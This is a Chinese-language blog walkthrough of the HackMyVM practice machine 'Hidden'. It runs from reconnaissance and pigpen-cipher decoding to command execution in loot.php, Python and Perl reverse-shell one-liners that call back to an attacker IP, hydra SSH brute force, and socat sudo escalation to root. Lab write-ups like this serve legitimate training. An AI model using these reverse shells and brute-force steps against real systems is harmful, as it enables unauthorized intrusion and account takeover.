freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

【靶机渗透】一个有趣的靶机 Hidden
safefox 2021-11-09 13:09:03 356550

【靶机渗透】一个有趣的靶机 Hidden

20210621010007.png

本篇将分享一个来源于HackMyVM社区,一个有趣的靶机Hidden

0x01靶机介绍

名称:HackMyVM : Hidden
链接https://hackmyvm.eu/machines/machine.php?vm=Hidden
发布日期2021年5月30日
作者noname
难度较简单

image-20210619180714056

0x02环境搭建

1. 下载靶机

官网链接直接下载

image-20210619180925527

image-20210619181028523

2. 创建靶机

下载好后将压缩包解压后的ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建

image-20210619181421768

等待导入完成

image-20210619181453402

创建完成

image-20210619181606145

将网络适配器设置为NET模式

image-20210619183425267

3. 开启靶机

点击 ▶开启此虚拟机

image-20210619181700103


0x03靶机渗透

攻击机使用Kali-Linux 2021.2 (IP:192.168.64.133)

1. 主机发现

arp-scan -l

发现目标主机 192.168.64.137

image-20210619200924362

2. 端口扫描

masscan 192.168.64.140 --rate=10000 --ports 0-65535

image-20210619201312125

仅识别2个开放的tcp端口22,80

3. 服务扫描

nmap -T4 -sV -p22,80 -O 192.168.64.137

-sV服务版本,-T4速度(最高为5,推荐用4)-O系统-p指定端口

image-20210619202209106

22是ssh,80是Apache http服务

4. web信息收集

Level 1

访问http://192.168.64.137/

image-20210619202312221

像是一个编码,查看F12源代码

image-20210619202505690

有一个提示

<!-- format xxx.xxxxxx.xxx -->

形式像是一个域名,12位,对应图片也是12个方格

尝试解密

image-20210619202727122

这个编码之前在在CTF中见过,英文叫Rosicrucian Cipher也被叫做Pigpen Cipher,翻译过来叫猪圈密码

image-20210619203843279

dcode在线工具解密

image-20210619205043578

结果是SYSHIDDENHMV,根据xxx.xxxxxx.xxx,得到sys.hidden.hmv

将sys.hidden.hmv添加到hosts

image-20210619205854528

ps:windows这里推荐工具HostsFileEditor

Level 2

来到Level 2

image-20210619205709282

使用gobuster进行目录扫描

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://sys.hidden.hmv -t 20

参数-dir目录暴力破解模式-e显示完整URL-w指定字典-x要搜索的文件扩展名

image-20210620210734443

users和members没有可利用地方,转到weapon上

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://sys.hidden.hmv/weapon -t 30

image-20210620211641506

找到一个可以的urlhttp://sys.hidden.hmv/weapon/loot.php

image-20210620211813696

尝试对LFI(本地文件包含漏洞)进行模糊测试,但失败了。

wfuzz -c -w /usr/share/wordlists/dirb/common.txt -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=FUZ2Z --hw 0

image-20210620214157758

试对代码执行进行模糊测试,成功

wfuzz -c -w /usr/share/wordlists/dirb/big.txt -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=whoami --hw 0

image-20210620215021194

成功拿到RCE

http://sys.hidden.hmv/weapon/loot.php?hack=whoami;id;pwd

image-20210620215150989

0x04漏洞利用

1. 反弹shell

这里推荐一个在线生成反弹shell的网站

使用python反弹shell

image-20210620220210921

http://sys.hidden.hmv/weapon/loot.php?hack=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.136",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

image-20210620215530788

攻击机nc监听

image-20210620215605078

反弹成功,获得www-data用户权限

通过以下命令获取一个标准shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20210620215640405

2. perl 提权

运行sudo -l命令显示当前可以运行所有命令

image-20210620215939615

因此,使用perl作为用户toreto获得反向 shell 。

image-20210620220304107

sudo -u toreto perl -e 'use Socket;$i="192.168.64.136";$p=4567;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

sudo -u toreto代表要以 toreto 的身份执行指令,所以反弹的是 toreto 用户

20210620224426.png

反弹成功

image-20210620224622094

获得 toreto用户权限

在目录/home/atenea/中有一个隐藏目录.hidden并且它似乎在文件atenea.txt中有atenea的密码列表

image-20210620225034108

3. SSH爆破

使用medusa对用户atenea 用户的SSH进行暴力破解

hydra -l atenea -P atenea.txt ssh://192.168.64.137

得到atenea密码sys8423hmv


4.拿flag

使用atenea用户ssh登录

image-20210620230713654

在/home/atenea找到user.txt

image-20210620230754497

得到user flaghmv{c4HqWSzRVKNDpTL}

5.权限提升

sudo -l

image-20210620231115240

用户 ' atenea' 可以作为root用户运行socat

使用GTFOBins找到socat

GTFOBins 是 Unix 二进制文件的精选列表,可用于绕过错误配置系统中的本地安全限制。

image-20210620231431235

socat stdin exec:/bin/sh

成功提权到root用户

image-20210620231719566

6. 拿flag2

在/root目录得到root.txt

image-20210620231836011

拿到root flaghmv{2Mxtnwrht0ogHB6}

0x05总结

这个靶机主要考察猪圈密码、目录枚举、模糊测试、反弹shell、per提权、SSH爆破和socat提权等内容,是一个不错的靶机,适合初级练习。在练习的过程中注意对以及靶机网卡配置,以及hosts文件的配置。


# web安全 # 初级靶机
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 safefox 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
靶机渗透
网络安全学习
safefox LV.3
这家伙太懒了,还未填写个人描述!
  • 4 文章数
  • 5 关注者
后渗透:文件传输指南
2025-01-23
【靶机渗透】HACKME: 1
2022-02-18
【靶机渗透】BLOGGER: 1
2022-02-18
文章目录